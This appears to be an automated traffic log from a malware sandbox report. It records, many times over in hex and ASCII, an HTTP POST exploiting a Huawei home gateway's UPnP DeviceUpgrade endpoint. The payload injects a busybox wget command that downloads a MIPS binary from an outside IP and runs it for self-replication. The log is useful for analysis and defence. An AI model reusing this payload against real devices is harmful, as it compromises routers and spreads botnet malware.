50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 